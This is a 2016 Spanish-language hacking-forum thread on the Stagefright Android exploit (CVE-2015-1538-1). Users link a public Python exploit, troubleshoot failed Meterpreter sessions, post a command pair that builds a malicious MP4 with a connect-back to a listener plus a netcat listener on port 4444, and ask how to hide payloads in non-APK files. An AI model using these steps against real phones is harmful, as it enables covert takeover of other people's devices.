Sólo texto | Texto con Imágenes

Underc0de

Programación Scripting => Python => Mensaje iniciado por: $francisco en Marzo 31, 2016, 04:22:00 PM

Título: [cve-2015-1538-1] Exploit para android en python
Publicado por: $francisco en Marzo 31, 2016, 04:22:00 PM
Es realmente interesante esta vulneravilidad de android que está basada en un bug del sofware multimeda que afecta de la versión 2.2 a la 5.1

https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py (https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py)

Se envia el video en el formato ".mp4" y este contiene el codigo para explotar la vulneravilidad en android y aunque todavia no lo he utlizado me parecio muy interesante y si lo pruebo os comento que tal fué.
Título: Re:[cve-2015-1538-1] Exploit para android en python
Publicado por: Alanprogrammer en Marzo 31, 2016, 05:27:57 PM
Habia oido algo sobre ese bug ahorita lo veo se oye interesante :)
Título: Re:[cve-2015-1538-1] Exploit para android en python
Publicado por: r4gnath0r en Septiembre 25, 2016, 11:23:30 AM
¿Alguien lo ha probado ya?
Título: Re:[cve-2015-1538-1] Exploit para android en python
Publicado por: d0r127 en Octubre 03, 2016, 03:39:58 PM
yo he llegado hasta aqui....vi el post y me parecio interesante..pero a la hora de ejecutar el script me daba errores...este video me ayudo a corregir ciertos errores que me daba al ejecutarlo https://www.youtube.com/watch?v=sQnGyIoNjr8 una vez consegui ejecutar el script segui los pasos, me genero el mp4 y al probarlo ese fue el resultado...no abre ninguna sesion



(http://i.imgur.com/MQ7rsiK.png)

(http://i.imgur.com/Bprw8cR.png)
Título: Re:[cve-2015-1538-1] Exploit para android en python
Publicado por: d0r127 en Octubre 03, 2016, 04:38:54 PM
yo he probado esto..consigo sesion pero se pierde a los pocos segundos..y a la hora de hacer un help en el meterpreter no aparecen opciones como sysinfo getuid shell etc...
(http://i.imgur.com/m00yZDa.png)
(http://i.imgur.com/8GR9VZA.png)
(http://i.imgur.com/g1SKthm.png)

el tio este lo hace desde el modulo ya cargado en metasploit pero yo no consigo cargar el modulo...lo intente haciendo esto
(http://i.imgur.com/RNdLPzr.png)
copie el script a la ruta donde estan los exploits y lo intente ejecutar desde la consola de metasploit pero me aparece como que no encuentra el script

video del tipo ejecutando el modulo en metasploit
https://www.youtube.com/watch?v=dAZ4W6OkkRk



Título: Re:[cve-2015-1538-1] Exploit para android en python
Publicado por: $francisco en Octubre 04, 2016, 06:01:21 PM
Yo probe con el 38164 y no funciona
Código (bash) [Seleccionar]
mp4.py -c 192.168.0.168 -p 4444
Código (bash) [Seleccionar]
netcat -l -p 4444

Yo tengo android 4.4.2 y no funciona supuestamente es para inferior a 5.0 y tambien probe con los demas exploit y nada
Título: Re:[cve-2015-1538-1] Exploit para android en python
Publicado por: ceroMee en Octubre 04, 2016, 11:17:12 PM
como que tiene muchos bugs ese exploit, o seran a proposito?
Título: Re:[cve-2015-1538-1] Exploit para android en python
Publicado por: $francisco en Octubre 05, 2016, 09:51:24 AM
Quizas sea a proposito pero se cambia rapido, solo es sustituir unas pocas cosas pero creo que esos errores los parchean enseguida
Título: Re:[cve-2015-1538-1] Exploit para android en python
Publicado por: r4gnath0r en Octubre 28, 2016, 11:00:00 AM
Yo estoy intentando abrir una sesion meterpreter en un android, pero no se instala la aplicacion .apk. ¿Alguien sabe por que?

También estoy buscando como añadir el payload en otro archivo que no sea apk, como en el caso de este post, crea un archivo mp4.
Sólo texto | Texto con Imágenes